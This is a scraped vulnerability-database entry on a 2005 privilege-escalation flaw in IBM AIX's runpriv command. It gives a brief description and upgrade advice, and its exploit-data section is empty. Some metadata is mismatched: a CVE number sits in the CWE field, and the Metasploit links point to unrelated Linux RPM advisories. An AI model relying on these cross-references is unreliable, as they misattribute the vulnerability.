Privilege Escalation in runpriv

vendor:

AIX

by:

milw0rm.com

7.2

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: AIX

Affected Version From: AIX 5.2

Affected Version To: AIX 5.3

Patch Exists: YES

Related CWE: CVE-2005-3106

CPE: o:ibm:aix:5.2

Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2006-0101/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2006-0101/

Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=21977, https://www.infosecmatter.com/nessus-plugin-library/?id=20732, https://www.infosecmatter.com/nessus-plugin-library/?id=117882, https://www.infosecmatter.com/list-of-metasploit-windows-exploits-detailed-spreadsheet/

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: AIX

2005

Privilege Escalation in runpriv

A vulnerability in the runpriv command of the IBM AIX operating system allows local users to gain root privileges. The vulnerability is due to the runpriv command not properly dropping privileges when executing a command. This allows a local user to execute a command as root. The vulnerability is present in AIX 5.2 and 5.3.

Mitigation:

Upgrade to the latest version of AIX 5.2 and 5.3.

Source

Privilege Escalation in runpriv

Mitigation:

Exploit-DB raw data: